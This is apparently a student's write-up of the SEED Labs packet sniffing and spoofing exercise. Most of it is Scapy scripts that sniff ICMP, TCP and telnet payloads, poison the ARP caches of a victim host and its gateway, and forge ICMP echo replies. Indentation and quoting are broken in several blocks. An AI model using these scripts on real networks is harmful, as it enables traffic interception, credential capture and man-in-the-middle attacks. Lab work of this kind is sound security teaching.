SEEDLAB_Packet Sniffing and Spoofing Lab

SEEDLAB_Packet Sniffing and Spoofing Lab

---

• Capture only the ICMP packet

  #-*-coding:utf-8-*-
  from scapy.all import *
  

def print_pkt(pkt):
pkt.show()

pkt = sniff(iface=”ens33”,filter=”icmp”,prn=print_pkt)

*  Capture any TCP packet that comes from a particular IP and with a destination port number 23
```python
#-*-coding:utf-8-*-
from scapy.all import *

def print_pkt(pkt):
    pkt.show()

pkt = sniff(iface="ens33",filter="tcp net 192.168.209.131 and tcp dst port 23",prn=print_pkt)

• Capture packets comes from or to go to a particular subnet. You can pick any subnet, such as 128.230.0.0/16; you should not pick the subnet that your VM is attached to.

  #-*-coding:utf-8-*-
  from scapy.all import *
  

def print_pkt(pkt):
pkt.show()

pkt = sniff(iface=”ens33”,filter=”net 192.168.202”,prn=print_pkt)

* send a packet
```python
-*-coding:utf-8-*-
from scapy.all import *

a = IP()
a.dst = '192.168.202.1'
a.ttl = 3
b = ICMP()
p = a/b
send(p)
ls(a)

• Sniffing telnet

  #-*-coding:utf-8-*-
  from scapy.all import *
  

def print_pkt(pkt):
raw = pkt.sprintf(“%Raw.load%”)
print raw

pkt = sniff(iface=”ens33”,filter=”tcp”,prn=print_pkt)

* Sniffing and-then Spoofing

```python
#响应arp报文
#-*-coding:utf-8-*-

from scapy.all import *

def init_arp():
    ether = Ether()
    ether.dst = "ff:ff:ff:ff:ff:ff"
    ether.src = "00:0c:29:e1:95:00"

    arp = ARP()
    arp.psrc = '192.168.20.1'
    arp.hwsrc = '00:0c:29:e1:95:00'
    arp.pdst = '192.168.20.1'
    arp.hwdst = 'ff:ff:ff:ff:ff:ff'
    arp.op = 1
    p = ether/arp
    for i in range(3):
        sendp(p)

def sniff_spool_arp(pkt):
    if pkt[0][Ether].dst == "ff:ff:ff:ff:ff:ff":
        a = ARP()
        a.pdst = pkt[0][ARP].psrc
        a.hwsrc = "00:0c:29:e1:95:00" #虚拟机mac地址
        a.psrc = pkt[0][ARP].pdst
        a.hwdst = pkt[0][ARP].hwsrc
        a.op = 2 #opcode为2表示响应
        for i in range(3):
            send(a)


init_arp()
pkt = sniff(iface="ens33",filter="arp",prn=sniff_spool_arp,store=0)

• 改进版arp欺骗

  #-*-coding:utf-8-*-
  

from scapy.all import *
import sys

#-*-

def attack_host():
ether = Ether()
ether.dst = host_mac
ether.src = attacker_mac #attacker’s mac

arp = ARP()
arp.psrc = gw_ip
arp.hwsrc = attacker_mac
arp.pdst = host
arp.hwdst = host_mac
arp.op = 1
p = ether/arp
for i in range(3):
    sendp(p)

def attack_gw():
ether = Ether()
ether.dst = gw_mac
ether.src = attacker_mac

arp = ARP()
arp.psrc = host
arp.hwsrc = attacker_mac
arp.pdst = gw_ip
arp.hwdst = gw_mac
arp.op = 1
p = ether/arp
for i in range(3):
    sendp(p)

def sniff_spool_arp(pkt):
a = ARP()
a.pdst = pkt[ARP].psrc
a.hwsrc = attacker_mac #attacker’s mac
a.psrc = pkt[ARP].pdst
a.hwdst = pkt[ARP].hwsrc
a.op = 2 #opcode为2表示响应
for i in range(3):
send(a)

if name == ‘main‘:
gw_ip = sys.argv[1]
gw_mac = getmacbyip(gw_ip)
host = sys.argv[2]
host_mac = getmacbyip(host)
iface = get_working_if()
attacker_mac = get_if_hwaddr(iface)

attack_host()
attack_gw()

pkt_filter = "arp net "+host+" or arp net "+gw_ip
pkt = sniff(iface="ens33",filter=pkt_filter,prn=sniff_spool_arp,store=0)

```python
#-*-coding:utf-8-*-
#响应icmp报文
from scapy.all import *

def send_icmp(pkt):
    a = IP()
    a.dst = pkt[0][IP].src
    a.src = pkt[0][IP].dst
    b = ICMP()
    b.id = pkt[0][ICMP].id
    b.seq = pkt[0][ICMP].seq
    b.type = 0
    b.code = 0
    c = Raw()
    c.load = pkt[0][Raw].load
    p = a/b/c
    send(p)

pkt = sniff(iface="ens33",filter="icmp",prn=send_icmp)

• 改进版icmp欺骗

  #-*-coding:utf-8-*-
  #响应icmp报文
  from scapy.all import *
  

iface = get_working_if()
attacker_mac = get_if_hwaddr(iface)

def send_icmp(pkt):
if pkt[0][Ether].src != attacker_mac:
a = IP()
a.dst = pkt[0][IP].src
a.src = pkt[0][IP].dst
b = ICMP()
b.id = pkt[0][ICMP].id
b.seq = pkt[0][ICMP].seq
b.type = 0
b.code = 0
c = Raw()
c.load = pkt[0][Raw]
p = a/b/c
send(p)

pkt = sniff(iface=”ens33”,filter=”icmp”,prn=send_icmp,store=0)

* 受害机添加网关
`sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 192.168.20.1`

* 验证

攻击机先后run sniff_spoof_arp脚本和sniff_spoof_icmp脚本
![](https://raw.githubusercontent.com/Danie1233/img/master/run.png)
然后
受害主机ping一个不存活的地址，会收到响应，欺骗成功
![](https://raw.githubusercontent.com/Danie1233/img/master/pingisok.png)